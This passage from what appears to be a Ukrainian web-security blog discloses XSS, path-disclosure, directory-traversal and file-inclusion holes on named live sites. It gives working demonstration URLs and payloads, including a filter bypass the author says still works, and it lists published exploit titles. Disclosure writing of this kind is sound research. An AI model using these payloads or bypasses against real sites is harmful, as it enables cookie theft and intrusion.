Websecurity - Веб безпека

30.08.2007

У лютому, 23.02.2007, я знайшов Cross-Site Scripting уразливість на http://www.siteedit.ru - сайті компанії, що займається розробкою CMS та проведенням аудиту безпеки сайтів. Про що найближчим часом сповіщу адміністрацію сайта.

Детальна інформація про уразливість з’явиться пізніше. Треба дати час адмінам на реакцію з цього приводу.

04.02.2008

XSS:

• alert(document.cookie)
• цікавий
• html включення (PR4)

Дана уразливість досі не виправлена.

В даній добірці експлоіти в веб додатках:

• SocketMail 2.2.8 fnc-readmail3.php Remote File Inclusion Vulnerability (деталі)
• Simple PHP Blog (sphpblog) <= 0.5.1 Multiple Vulnerabilities (деталі)
• LiteSpeed Web Server <= 3.2.3 Remote Mime Type Injection (деталі)
• InstaGuide Weather Script (index.php) Local File Inclusion Vulnerability (деталі)
• Oracle 10g CTX_DOC.MARKUP SQL Injection Exploit (деталі)
• PHP-Nuke Platinum 7.6.b.5 Remote File Inclusion Vulnerability (деталі)
• Flatnuke 3 Remote Cookie Manipoulation / Privilege Escalation (деталі)
• Flatnuke 3 Remote Command Execution / Privilege Escalation (деталі)
• PHP Image 1.2 Multiple Remote File Inclusion Vulnerabilities (деталі)
• Php-Stats <= 0.1.9.1b "ip" urldecode()/ ereg() / sql injection / cleat text admin pass disclosure exploit (method ii) (деталі)

Ще у листопаді, 12.11.2006, я знайшов Cross-Site Scripting, Full path disclosure, Directory Traversal та Local File Inclusion уразливості на http://websense.com - сайті секюріті компанії Websense (зокрема в пошуці по сайту http://search.websense.com). Спочатку я знайшов XSS та Full path disclosure дірки, і поки черга дійшла до публікації дір на даному сайті (що трохи відклалось), вияснилося, що вони вже виправили XSS . Тому я знайшов ще нові Directory Traversal та Local File Inclusion дірки, і відклав на деякий час їх публікацію (що знову відтермінувало цей процес).

І от в минулому місяці я дістався вже до ціх дірок на сайті Websense, але вияснилось, що вони повністю відмовилися від свого попереднього пошукового движка і створили новий (більш простий, але й без дір). Тому опублікую зараз вже неактуальні уразливості (котрі вірогідно так і не були повністю виправлені адмінами сайта, вони просто змінили локальний пошуковець). Саме цікаве в даних уразливостях - це знайдена мною Cross-Site Scripting уразливість, за ради якої варто опублікувати дану інформацію.

Знайдена мною 12.11.2006 XSS уразливість на даному сайті - це новий тип XSS уразливостей, котрий я назвав Remote HTML Include та Remote XSS Include. Про даний тип уразливостей я згадав під час MOSEB в записі Vulnerabilities at images.google.com. В 2007 році з’явилися й публікації інших дослідників про подібні уразливості, але я виявив її першим ще в листопаді 2006, тому являюся першовідкривачем даного типу XSS уразливостей .

XSS: Remote HTML Include / Remote XSS Include:

http://search.websense.com/highlight/index.html?url=http://websecurity.com.ua/webtools/xss_r.html&fterm=test&la=en&charset=iso-8859-1&search=../query.html%3Fcharset%3Diso-8859-1%26qt%3Dtest

Full path disclosure:

http://search.websense.com/highlight/index.html?url=http%3A//www.websense.com/internet-filtering/index.php&fterm=test%3C&la=en&charset=iso-8859-1&search=../query.html%3Fcharset%3Diso-8859-1%26qt%3Dtest%3C

Directory Traversal:

http://search.websense.com/help/syntax.html?la=/../index

Local File Inclusion:

http://search.websense.com/help/syntax.html?la=/../query

В своїй презентації Web App Security, Joe Walker розповідає про безпеку веб додатків. Про різні напрямки веб атак та методи протидії їм. Зокрема він розповідає про CSRF, XSS, інтранет хакінг та комбо атаки.

Десятки тисяч веб-сайтів компаній зі списку Fortune 500, державних урядових закладів і шкіл були заражені шкідливим кодом, спрямованим на крадіжку паролів до онлайн-ігор.

Більш 94000 URL заражені екплоітом, що перенаправляє користувачів на домен uc8010.com. Інфіковано ресурси ІБ-компанії Computer Associates, а також сайти, що належать владі Вірджинії, міста Клівленд і Бостонського університету.

“Коло об’єктів, що були інфіковані, дуже широке, - сказала Мері Лендсмен, дослідник зі ScanSafe, компанії, що надає інформацію про шкідливі сайти. - Це реальний приклад того, що ми бачимо щодня. І це показує компаніям, що зацікавлені у веб-присутності, як важливо уважно подивитися на стан своєї системи безпеки”.

“Хакери змогли інфікувати сайти, використовуючи SQL-ін’єкції”, - повідомляє Йоханнес Ульріх, головний технолог Internet Storm Center. В ін’єкції включений JavaScript код, що перенаправляє користувачів на інші сайти. Уразливості цих сайтів дозволяють встановити шкідливе ПЗ на комп’ютери користувачів для крадіжки паролів до різних онлайн-ігор.

По матеріалам http://safe.cnews.ru.

В даній добірці уразливості в веб додатках:

• SquirrelMail G/PGP Encryption Plug-in Remote Command Execution Vulnerability (деталі)
• SquirrelMail G/PGP Encryption Plug-in Remote Command Execution Vulnerability (деталі)
• Six Remote Memory Corruption Vulnerabilities in IBM WebSphere MQ 6.0 (деталі)
• phpTrafficA Local File Inclusion (деталі)
• FlashGameScript v1.5.4 Remote File Inclusion Vulnerability (деталі)
• arabhost Remote Incluude File (деталі)
• JBrowser acces to admin/config files (деталі)
• Уразливість при обробці даних в WinFtp Server (деталі)
• Directory traversal vulnerability in GeoIP 1.4.0 (деталі)
• Переповнення буферу в Sambar FTP Server (деталі)
• Sun Java security update (деталі)
• Декілька уразливостей в PHP-Update (деталі)
• SQL-ін’єкція в Burak Yilmaz Download Portal (деталі)
• Multiple PHP file inclusion vulnerabilities in WGS-PPC (aka PPC Search Engine) (деталі)
• SQL injection vulnerability in Motionborg Web Real Estate (деталі)

В минулому місяці я дав інтерв’ю журналу Афіша. І в п’ятому номері журналу, що вийде в лютому (вже на наступному тижні), буде розміщений опис моєї персони в рубриці Персона, зроблений на основі інтерв’ю.

Так що кому буде цікаво прочитати інформацію про мене, як тим хто вже читав мій профайл в січневому номері InternetUA , так і всім іншим, можете дістати собі п’ятий номер Афіши.

29.08.2007

У лютому, 23.02.2007, я знайшов Cross-Site Scripting уразливості на секюріті проекті http://www.uinc.ru (Underground InformatioN Center). Про що найближчим часом сповіщу адміністрацію проекту.

Детальна інформація про уразливості з’явиться пізніше.

01.02.2008

XSS:

POST запит на сторінці http://www.uinc.ru/news/sendnews.php:

"><script>alert(document.cookie)</script>В полях: Тема, Ваше имя, Ваш E-mail.

</textarea><script>alert(document.cookie)</script>В полі: Ваше сообщение.

Дані уразливості вже виправлені, але неякісно. При невеликій модифікації коду три з чотирьох XSS знову працюють.

XSS:

POST запит на сторінці http://www.uinc.ru/news/sendnews.php (IE):

" style="xss:expression(alert(document.cookie))В полях: Тема, Ваше имя, Ваш E-mail.

В даній добірці експлоіти в веб додатках:

• LimeSurvey <= 1.52 (language.php) Remote File Inclusion Vulnerability (деталі)
• PHPDJ 0.5 (djpage.php page) Remote File Inclusion Vulnerability (деталі)
• ZZ FlashChat <= (help.php) 3.1 Local File Inclusion Vulnerability (деталі)
• Vanilla <= 1.1.3 Remote Blind SQL Injection Exploit (деталі)
• SMF 1.1.3 Extremely fast Blind SQL Injection Exploit (деталі)
• BBPortalS <= 2.0 Remote Blind SQL Injection Exploit (деталі)
• PHP Project Management <= 0.8.10 Multiple RFI / LFI Vulnerabilities (деталі)
• PeopleAggregator <= 1.2pre6-release-53 Multiple RFI Vulnerabilities (деталі)
• TOWeLS 0.1 scripture.php Remote File Inclusion Vulnerability (деталі)
• Php-Stats <= 0.1.9.1b admin 2 exec() exploit (деталі)